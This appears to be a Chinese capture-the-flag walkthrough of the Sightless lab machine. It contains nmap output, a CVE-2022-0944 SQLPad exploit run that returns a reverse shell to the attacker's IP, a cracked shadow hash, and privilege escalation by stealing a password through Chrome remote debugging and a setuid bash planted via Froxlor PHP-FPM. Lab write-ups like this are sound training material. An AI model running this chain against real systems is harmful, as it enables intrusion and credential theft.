官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
- 关注
本文由
创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.11.32 | TCP:21,22,80 |
$ nmap -p- 10.10.11.32 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_ 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.94SVN%I=7%D=10/9%Time=67062BFA%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,A0,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x20
SF:Server\)\x20\[::ffff:10\.10\.11\.32\]\r\n500\x20Invalid\x20command:\x20
SF:try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\x
SF:20being\x20more\x20creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SQLPad
# echo '10.10.11.32 sightless.htb'>>/etc/hosts
http://sightless.htb/
# echo '10.10.11.32 sqlpad.sightless.htb'>>/etc/hosts
http://sqlpad.sightless.htb/
https://github.com/shhrew/CVE-2022-0944
$ python3 main.py http://sqlpad.sightless.htb 10.10.16.10 10032
root(fack) -> michael
# cat /etc/shadow
$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/
$ hashcat -a 0 hash /usr/share/wordlists/rockyou.txt --force
)
insaneclownposse
$ ssh michael@10.10.11.32
User.txt
75ce007325d8c9b8c70ab263b7b73da8
权限提升 - Chrome Remote Debugger && Forxlor-PHP_FPM
$ netstat -lnput
$ ssh michael@10.10.11.32 \ -L 8080:127.0.0.1:8080 \ -L 3306:127.0.0.1:3306 \ -L 60469:127.0.0.1:60469 \ -L 38871:127.0.0.1:38871 \ -L 35295:127.0.0.1:35295 \ -L 3000:127.0.0.1:3000 \ -L 33060:127.0.0.1:33060
通过linpeas枚举后,我们知道了是john用户启动了--remote-debugging-port模式
--remote-debugging-port 是一个命令行参数,它用于启动 Chrome 浏览器的远程调试模式。当 Chrome 浏览器以这种方式启动时,它会在指定的端口上监听调试器的连接,允许远程调试和控制浏览器会话。
wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
$ google-chrom
chrome://inspect/#devices
username:admin password:ForlorfroxAdmin
点击查看,等待几秒即可通过Chrome 调试器截获到John输入的管理员密码
http://127.0.0.1:8080/admin_phpsettings.php?page=fpmdaemons&action=add
创建PHP-FPM版本,利用PHP-FPM执行命令
rev.sh:cp /bin/bash /tmp;chmod +s /tmp/bash
你可以把命令直接输入成:chmod 4755 /bin/bash
重启PHP-FPM
http://127.0.0.1:8080/admin_settings.php?page=overview&part=phpfpm
首先禁用,并且保存
再次启动保存
michael@sightless:/tmp$ ./bash -p
Root.txt
9047f8db692036cd19e6bbfbc92708fb
已在FreeBuf发表 0 篇文章
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
- 0 文章数
- 0 关注者